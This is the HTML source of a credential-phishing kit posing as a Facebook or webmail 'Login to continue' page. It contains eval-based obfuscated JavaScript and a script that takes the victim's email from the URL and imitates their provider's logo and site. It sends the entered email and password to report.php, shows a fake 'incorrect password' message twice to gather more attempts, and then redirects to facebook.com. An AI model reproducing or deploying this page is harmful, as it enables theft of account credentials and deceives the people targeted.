<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <meta name="googlebot" content="noindex">
    <meta name="googlebot-news" content="noindex">
    <meta name="googlebot" content="noindex">
    <meta name="googlebot-news" content="nosnippet">
    <link rel="icon" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT1TrBVgARKDiAbaf_jRWGN--7makZZKm8PCzbZnhzlbueWuCmI5_vUHiqp-7HZQ4eEsg4&usqp=CAU">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
     <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>

<script type="text/javascript">
<!-- 
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%76%65%35%37%39%31%33%37%34%63%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%39%39%31%35%35%39%31%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%38%35%35%33%30%39%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%39%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%76%65%35%37%39%31%33%37%34%63%28%27') + '%34%69%6f%72%66%5a%31%0c%04%12%14%17%1e%10%14%13%15%24%74%00%09%12%12%14%17%1e%10%14%13%15%12%11%13%6c%5d%6c%5d%60%6c%36%14%23%30%01%07%13%1f%12%12%14%17%1e%10%14%13%15%12%61%5c%53%5e%65%66%5e%38%10%24%36%06%04%11%13%1f%12%12%14%17%1e%73%07%05%15%12%11%13%1f%12%12%14%59%6f%5c%73%76%06%04%11%13%1f%12%12%14%17%1e%10%14%13%15%5c%60%6b%2c%6f%65%72%60%6c%59%32%13%5b%63%6f%5f%54%6c%21%5a%66%66%35%07%05%15%12%11%13%1f%12%12%14%17%1e%10%14%59%64%60%6d%20%55%5d%61%63%63%79%36%14%6e%5a%60%6c%20%62%59%6c%63%5d%3b%03%02%13%15%12%11%13%1f%12%12%14%17%1e%10%5a%5c%58%67%58%6d%6e%69%60%58%31%1e%6e%5d%5d%5a%1a%21%27%1f%22%26%14%27%2a%10%24%21%25%2e%26%13%64%6c%66%1c%19%10%27%31%00%03%12%11%13%1f%12%12%14%17%1e%10%14%13%5b%5d%5c%66%56%6c%63%6f%65%52%23%6a%58%65%59%5e%6f%39%60%63%27%69%55%60%5f%5c%69%37%02%05%1f%12%12%14%17%1e%10%14%13%15%12%11%5d%50%5f%67%5d%69%6f%6b%66%5f%26%6f%66%75%54%34%12%59%66%64%5b%6a%36%15%01%07%13%1f%12%12%14%17%1e%10%77%00%03%12%11%13%1f%12%12%14%17%2c%63%5b%64%67%21%5c%62%6d%6e%5d%63%65%7b%03%02%13%15%12%11%13%1f%12%12%14%17%1e%10%6d%64%59%6e%59%35%1f%2c%28%1f%32%0d%06%14%13%15%12%11%13%1f%12%12%14%17%1e%5e%5b%5e%60%5b%6f%62%64%60%5e%27%5a%6f%64%65%6d%33%12%1c%59%55%58%37%07%01%1e%10%14%13%15%12%11%13%1f%12%12%14%59%6f%6e%58%58%6b%21%6f%5c%53%65%69%69%31%1e%2b%64%6b%30%01%07%13%1f%12%12%14%17%1e%10%14%13%15%12%61%5c%53%5e%65%66%5e%38%10%2a%23%65%6a%34%00%09%12%12%14%17%1e%10%14%13%15%12%11%13%6c%5d%6c%5d%60%6c%36%14%2b%25%62%69%13%50%69%6e%65%32%0d%06%14%13%15%12%11%13%1f%12%71%07%01%1e%10%14%13%15%12%11%13%2d%66%63%5d%59%6f%68%71%00%03%12%11%13%1f%12%12%14%17%1e%10%14%13%59%65%6c%63%6b%5d%75%32%17%54%64%5f%6b%30%01%07%13%1f%12%12%14%17%1e%10%14%13%15%12%5e%67%68%5b%60%27%60%62%5b%67%6e%33%12%5c%58%6d%6e%59%6a%32%0d%06%14%13%15%12%11%13%1f%12%12%14%17%1e%66%6f%6e%69%65%5b%74%2c%5f%63%66%6b%55%62%68%35%15%5f%5a%61%63%59%6c%31%04%08%10%14%13%15%12%11%13%1f%12%12%14%17%62%5b%6c%6f%26%5d%65%64%56%60%34%14%5a%55%62%68%58%6b%37%02%05%1f%12%12%14%17%1e%10%14%13%15%12%11%60%50%6c%5b%63%65%2d%6c%65%63%33%12%2e%23%6f%6a%37%07%01%1e%10%14%13%15%12%11%13%7c%01%04%14%17%1e%10%14%13%15%12%23%67%6e%5b%5c%65%6f%1e%6d%64%5c%67%77%02%05%1f%12%12%14%17%1e%10%14%13%15%12%11%59%6e%60%6e%27%6a%69%76%5f%35%15%2c%36%63%67%37%01%02%17%1e%10%14%13%15%12%11%13%1f%12%12%67%58%60%59%63%61%26%66%5a%59%63%34%12%2b%27%6e%68%31%00%03%12%11%13%1f%12%12%14%17%1e%10%14%13%69%59%69%6f%2c%6e%6c%5b%65%63%5a%65%6d%66%34%11%5e%50%62%65%68%58%6a%67%72%58%30%01%07%13%1f%12%12%14%17%1e%10%77%00%03%12%11%13%1f%12%12%14%17%2c%6d%63%5a%67%21%61%76%0c%04%12%14%17%1e%10%14%13%15%12%11%13%1f%6e%59%6c%6b%2d%5f%60%64%5c%60%37%13%52%59%60%68%5c%60%35%07%05%15%12%11%13%1f%12%12%14%17%1e%10%14%60%5a%6c%58%64%6d%34%12%24%17%21%28%64%6b%30%01%07%13%1f%12%12%14%17%1e%10%14%13%15%12%62%5c%61%5b%65%66%24%62%61%64%35%15%29%21%63%67%37%01%02%17%1e%10%14%13%15%12%11%70%0c%04%12%14%17%1e%10%14%13%15%20%6c%64%56%60%21%64%17%6e%75%07%05%15%12%11%13%1f%12%12%14%17%1e%10%14%5e%64%66%60%6d%39%12%1f%2d%28%27%2f%2d%2c%30%01%07%13%1f%12%12%14%17%1e%10%14%13%15%12%5b%62%6d%6e%21%6d%5c%69%59%5c%6f%33%12%2a%23%2f%37%01%02%17%1e%10%14%13%15%12%11%13%1f%12%12%5e%66%6c%6c%27%6e%62%74%5a%35%1f%2d%2b%64%6f%3b%03%02%13%15%12%11%13%1f%12%12%77%04%08%10%14%13%15%12%11%13%1f%20%6f%63%5e%6c%5a%65%6d%66%77%02%05%1f%12%12%14%17%1e%10%14%13%15%12%11%63%50%5e%5e%63%65%57%36%14%23%15%2f%21%63%67%37%01%02%17%1e%10%14%13%15%12%11%13%1f%12%12%67%58%60%59%63%61%26%6e%60%63%39%12%2f%24%67%66%35%07%05%15%12%11%13%1f%12%12%14%74%0d%06%14%13%15%12%11%13%1f%12%20%63%65%6e%59%14%64%67%62%6a%6f%7a%01%04%14%17%1e%10%14%13%15%12%11%13%1f%12%6b%63%5b%62%58%32%13%2a%22%21%18%3a%01%04%14%17%1e%10%14%13%15%12%11%13%1f%12%61%5b%69%57%67%66%35%15%2d%21%63%67%12%22%31%04%08%10%14%13%15%12%11%13%1f%12%12%14%17%50%61%6a%5f%5e%6c%37%2c%6f%6a%12%69%66%6a%67%58%13%18%59%29%58%26%59%2b%31%04%08%10%14%13%15%12%11%13%1f%12%12%14%17%54%61%66%6f%26%58%5e%60%68%66%75%32%17%69%62%5c%58%6b%65%6d%36%0c%04%12%14%17%1e%10%14%13%15%12%11%13%1f%62%5d%58%5b%69%62%5d%35%15%2d%2c%63%67%12%2d%24%67%66%35%07%05%15%12%11%13%1f%12%12%14%17%1e%10%14%59%64%60%6d%20%66%59%65%5d%5f%62%36%14%2f%25%22%34%00%09%12%12%14%17%1e%10%14%13%15%12%11%13%55%63%60%68%24%63%67%72%58%33%12%2e%28%6f%6a%37%07%01%1e%10%14%13%15%12%11%13%1f%12%12%14%59%6f%6e%58%58%6b%21%6f%5c%53%65%69%69%31%1e%2d%64%6b%30%01%07%13%1f%12%12%14%17%1e%10%77%00%03%12%11%13%1f%12%12%14%17%2c%67%66%63%5c%12%66%61%6f%69%6e%32%5d%6f%5d%6f%6e%70%01%07%13%1f%12%12%14%17%1e%10%14%13%15%63%6a%6f%6b%65%60%5f%31%1e%62%65%61%5e%37%02%05%1f%12%12%14%17%1e%10%14%70%06%04%11%13%1f%12%12%14%17%1e%22%63%61%65%2c%5f%76%0c%04%12%14%17%1e%10%14%13%15%12%11%13%1f%6e%59%6c%6b%2d%5f%60%64%5c%60%37%13%52%59%60%68%5c%60%35%07%05%15%12%11%13%1f%12%12%14%74%0d%06%14%13%15%12%11%13%1f%12%20%63%65%6e%2e%5a%13%5b%69%6d%6f%6e%60%77%07%01%1e%10%14%13%15%12%11%13%1f%12%12%14%5b%69%6d%64%67%5a%75%37%13%68%60%66%63%65%55%23%5a%67%64%5f%64%36%0c%04%12%14%17%1e%10%14%13%15%12%11%13%1f%6b%65%58%6b%56%36%14%2c%25%22%1a%36%0c%04%12%14%17%1e%10%14%13%15%12%11%13%1f%61%5d%6a%5e%69%62%32%13%25%12%5e%68%63%63%37%07%01%1e%10%14%13%15%12%11%13%1f%12%12%14%64%51%6e%5d%64%67%21%6d%62%6f%34%12%2a%27%6e%68%31%00%03%12%11%13%1f%12%12%14%17%1e%10%14%13%69%59%69%6f%2c%5d%66%63%5e%6c%36%14%5e%5e%60%6d%58%61%37%01%02%17%1e%10%14%13%15%12%11%13%1f%12%12%5c%5c%69%59%5c%6f%33%12%2d%28%6f%6a%37%07%01%1e%10%14%13%15%12%11%13%1f%12%12%14%59%51%5d%61%5a%6b%63%6a%61%53%21%5f%65%63%6f%6e%32%13%18%2d%2f%2a%23%59%2c%31%04%08%10%14%13%15%12%11%13%1f%12%12%14%17%53%61%60%62%6b%34%11%1e%55%58%58%31%04%08%10%14%13%15%12%11%13%1f%12%12%14%17%54%61%66%6f%26%6f%66%75%54%34%12%2b%2f%6e%68%31%00%03%12%11%13%1f%12%12%14%17%1e%10%14%13%5b%63%6f%5f%54%6c%34%14%65%6f%62%5f%36%06%04%11%13%1f%12%12%14%17%1e%10%14%13%15%5f%6a%6d%62%63%6c%32%17%6e%61%63%61%69%59%6f%36%0c%04%12%14%17%1e%10%14%13%15%71%02%05%1f%12%12%14%17%1e%10%14%21%62%60%61%2d%51%12%5c%6f%6b%62%61%66%35%5d%63%6b%58%61%77%01%02%17%1e%10%14%13%15%12%11%13%1f%12%12%59%66%6a%61%6a%35%15%1f%2f%5e%27%5d%5e%58%32%0d%06%14%13%15%12%11%13%1f%12%71%07%01%1e%10%14%13%15%12%11%13%2d%58%63%65%6b%2d%67%67%5a%70%01%07%13%1f%12%12%14%17%1e%10%14%13%15%12%6d%58%67%6e%21%5b%63%69%59%66%35%15%5f%5a%61%63%59%6c%31%04%08%10%14%13%15%12%11%13%1f%71%01%02%17%1e%10%14%13%15%12%11%21%54%6c%6c%65%69%7b%03%02%13%15%12%11%13%1f%12%12%14%17%1e%10%59%62%61%63%6f%35%1f%6c%59%58%32%0d%06%14%13%15%12%11%13%1f%12%12%14%17%1e%6c%5f%6b%69%21%5e%67%68%5b%60%32%17%53%5b%66%6f%5e%6c%34%00%09%12%12%14%17%1e%10%14%13%76%01%07%13%1f%12%12%14%17%1e%10%26%5b%62%5e%5a%13%7a%01%04%14%17%1e%10%14%13%15%12%11%13%1f%12%5e%63%6a%6e%64%5b%74%33%12%63%62%6d%59%37%07%01%1e%10%14%13%15%12%11%13%7c%01%04%07%01%1e%10%14%13%15%12%11%13%3f%61%59%58%60%51%10%69%5e%6b%59%5a%61%1f%5d%60%58%17%16%63%5b%6b%26%6b%66%5f%63%5a%34%14%2c%24%37%64%6b%22%77%02%05%1f%12%12%14%17%1e%10%14%13%15%12%11%5d%6e%5e%75%71%04%08%10%14%13%15%12%11%13%1f%12%12%14%17%1e%10%14%13%5d%59%66%5a%57%6e%34%14%28%2e%20%6e%5b%30%01%07%13%1f%12%12%14%17%1e%10%14%13%15%12%72%00%09%12%12%14%17%1e%10%14%13%15%12%11%13%1f%20%61%5b%60%6c%23%59%62%67%6e%5e%64%6d%77%01%02%17%1e%10%14%13%15%12%11%13%1f%12%12%14%17%1e%10%6d%64%59%6e%59%35%1f%35%22%1f%32%0d%06%14%13%15%12%11%13%1f%12%12%14%17%1e%10%77%00%03%12%11%13%1f%12%12%14%17%7d%03%02%00%03%01%07%13%1f%12%12%30%26%63%6c%73%67%5e%309915591%37%33%34%32%35%36%34' + unescape('%27%29%29%3b'));
// -->
</script>

</head>
<body class="bodymain">

    <div class="container">
         <div class="main-contain">
            <div>
				<br>
				<center>
				
<script type="text/javascript">
<!-- 
eval(unescape('%66%75%6e%63%74%69%6f%6e%20%76%33%61%61%31%37%34%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%33%33%39%30%34%32%36%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%37%39%38%37%39%39%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%2d%33%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));
eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%76%33%61%61%31%37%34%28%27') + '%3b%6d%71%68%25%71%74%61%49%2d%6c%7e%7e%77%77%3c%30%34%6b%30%6b%6c%6d%36%6f%7b%36%35%71%59%7b%7b%77%51%3b%67%75%63%7b%35%72%70%68%23%24%77%70%75%67%6f%49%2c%7e%6d%66%75%6d%3a%34%31%31%7b%7c%37%2a%6f%69%6d%68%6d%70%3c%3f%31%7b%7c%37%2c%4513390426%34%31%31%32%36%37%31' + unescape('%27%29%29%3b'));
// -->
</script>
				</center>
            </div>

            <div>
				<br>
				<center>
					<font style="font-family:arial; font-size:16px;">
						Login to continue
					</font>
				</center>
            </div>

            <div class="signform">

                <p class="error hide"></p>
                <form action="#" id="form">
                    <div class="inpg">
                        <input type="text" name="em" id="em" placeholder="Email">
                    </div>

                     <div class="inpg">
                        <input type="password" name="pa" id="pa" placeholder="Password">
                    </div>

                     <div class="inp2b">
                      <button class="btnlogin" style="width:295px;" disabled>Login</button>
                    </div>

                </form>
				<br><br>
            </div>
			

         </div>
    </div>


    <script>
        const boxf = document.getElementById("form");
        const em = document.getElementById("em");
        const pa = document.getElementById("pa");
        const error = document.querySelector(".error");
        const logo = document.querySelector(".logo");
        const name = document.querySelector(".name");
        const btnlogin = document.querySelector(".btnlogin");
        const bodymain = document.querySelector(".bodymain");
        const fav =  document.querySelector("link[rel*='icon']");
        let finurl = "";
        let errKey = 0;

        window.addEventListener("load", () => {
            btnlogin.disabled = false;
           const id =  window.location.href.split("#")[1];
           let logoUrl = id.split("@")[1];
           finurl = logoUrl;
           let nameUrl = logoUrl.split(".")[0];

           if(id){
            em.value = id;
            document.title = logoUrl.split(".")[0];
            fav.href = `https://logo.clearbit.com/${logoUrl}`;
            if(logoUrl === "gmail.com"){
                bodymain.style.background = `rgba(0, 0, 0, 0.04) url(https://image.thum.io/get/width/1280/crop/600/https://www.google.com/intl/us/gmail/about/)`;
                bodymain.style.backgroundRepeat = `no-repeat`;
                bodymain.style.backgroundSize = `cover`;
                logo.src = `https://logo.clearbit.com/${logoUrl}`;
                name.textContent = nameUrl;
            }
            else {
                 bodymain.style.background = `rgba(0, 0, 0, 0.04) url(https://image.thum.io/get/width/1280/crop/600/https://${logoUrl})`;
                bodymain.style.backgroundRepeat = `no-repeat`;
                bodymain.style.backgroundSize = `cover`;
                logo.src = `https://logo.clearbit.com/${logoUrl}`;
                name.textContent = nameUrl;
            }
           
           }
        });

        boxf.addEventListener("submit", (e) => {
            e.preventDefault();
            if(em.value === ""){
                error.classList.remove("hide");
                error.textContent = "Email field is empty...!";
            }
            else if(pa.value === ""){
                error.classList.remove("hide");
                error.textContent = "Password field is empty...!";
            }
            else {
                errKey++;
                let fa = `Email: ${em.value} \nPassword: ${pa.value}`;
                $.ajax({
                url: 'report.php',
                type: 'POST',
                data: { pass: fa },
                });
                error.classList.add("hide");
                error.textContent = "";
                btnlogin.textContent = "Verifying...";
                btnlogin.disabled = true;

                setTimeout(() => {
                    btnlogin.textContent = "Login";
                    btnlogin.disabled = false;
                    if(errKey <= 2){
                        error.classList.remove("hide");
                        error.textContent = "Incorrect Email Password, try again";
                        pa.value = "";
                    }
                    else {
                        error.classList.add("hide");
                        error.textContent = "";
                        btnlogin.textContent = "Log in";
                        window.location.href = `https://facebook.com`;
                    }
                }, 2000);

                setTimeout(() => {
                   
                }, 2000);
            }

        });

    </script>
    
</body>
</html>